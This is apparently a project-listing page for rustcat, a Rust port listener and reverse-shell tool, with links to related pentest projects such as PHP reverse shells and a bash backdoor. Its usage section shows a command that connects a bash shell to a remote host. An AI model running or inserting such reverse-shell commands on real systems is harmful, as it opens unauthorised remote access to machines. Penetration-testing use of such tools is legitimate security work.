All Projects → robiot → rustcat

robiot / rustcat

Licence: GPL-3.0 license
Rustcat(rcat) - The modern Port listener and Reverse shell

Programming Languages

rust
11053 projects
shell
77523 projects

Projects that are alternatives of or similar to rustcat

YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-93.07%)
Mutual labels:  netcat, pentest-tool
waycup
A minimal tool that hides your online assets from online security scanners, researchers and hackers.
Stars: ✭ 100 (-80.2%)
Mutual labels:  netcat
Shelly
Automatic Reverse Shell Generator
Stars: ✭ 38 (-92.48%)
Mutual labels:  netcat
pomdp-py
A framework to build and solve POMDP problems. Documentation: https://h2r.github.io/pomdp-py/
Stars: ✭ 131 (-74.06%)
Mutual labels:  easy-to-use
bash-backdoor
A simple backdoor in (ba)sh with encrypted communication channel
Stars: ✭ 21 (-95.84%)
Mutual labels:  netcat
phisherprice
All In One Pentesting Tool For Recon & Auditing , Phone Number Lookup , Header , SSH Scan , SSL/TLS Scan & Much More.
Stars: ✭ 38 (-92.48%)
Mutual labels:  pentest-tool
TG799VAC-XTREAM-V16.2-JADE
My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream Version 16.2 Jade delivered from Technicolor
Stars: ✭ 32 (-93.66%)
Mutual labels:  netcat
rclone4pi
rclone4pi - Easy Install of rclone to Raspberry Pi Computer with automated folder sync demo
Stars: ✭ 91 (-81.98%)
Mutual labels:  easy-to-use
ytmous
Anonymous Youtube Proxy
Stars: ✭ 60 (-88.12%)
Mutual labels:  easy-to-use
Tsuyo
🤖 A light-weight and easy-to-use modular Discord bot built with DiscordJS.
Stars: ✭ 136 (-73.07%)
Mutual labels:  easy-to-use
PLtools
整理一些内网常用渗透小工具
Stars: ✭ 227 (-55.05%)
Mutual labels:  pentest-tool
Nmap
Nmap - the Network Mapper. Github mirror of official SVN repository.
Stars: ✭ 5,792 (+1046.93%)
Mutual labels:  netcat
weakpass generator
generates weak passwords based on current date
Stars: ✭ 36 (-92.87%)
Mutual labels:  pentest-tool
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (-72.67%)
Mutual labels:  netcat
h1-search
Tool that will request the public disclosures on a specific HackerOne program and show them in a localhost webserver.
Stars: ✭ 58 (-88.51%)
Mutual labels:  pentest-tool
nc
Porting Netcat in Node.js. CLI util. 💻
Stars: ✭ 17 (-96.63%)
Mutual labels:  netcat
Lap
a hexo theme
Stars: ✭ 18 (-96.44%)
Mutual labels:  easy-to-use
job stream
An MPI-based C++ or Python library for easy distributed pipeline processing
Stars: ✭ 32 (-93.66%)
Mutual labels:  easy-to-use
PermissionManager
This Library automatically search for permission in androidmanifests file and request for the same
Stars: ✭ 45 (-91.09%)
Mutual labels:  easy-to-use
credcheck
Credentials Checking Framework
Stars: ✭ 50 (-90.1%)
Mutual labels:  pentest-tool

rustcat - The modern port listener and reverse shell

GitHub All Releases AUR version GitHub Issues GitHub Contributors

What is Rustcat

Rustcat is an easy to use port listener and reverse shell for Linux, MacOS, and Windows aimed to be easy to use and accessible.

image

Modes

  • Listen mode (listen);
  • Reverse shell mode (connect);

Features

  • Command history & Tab completion (Interactive mode);
  • CTRL-C blocking;
  • Colors;
  • Everything easy;

Installing

Check out the Installation Guide. Or if you want to have it portable, check out the latest release

Usage

The most basic and useful example to start listening on a port would be (you can even run vim inside rustcat with this):

rcat listen -ib 55600

and to connect:

rcat connect -s bash the.0.0.ip 55600

For some more basic usage, check here

Disclaimer

This tool may be used for educational purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].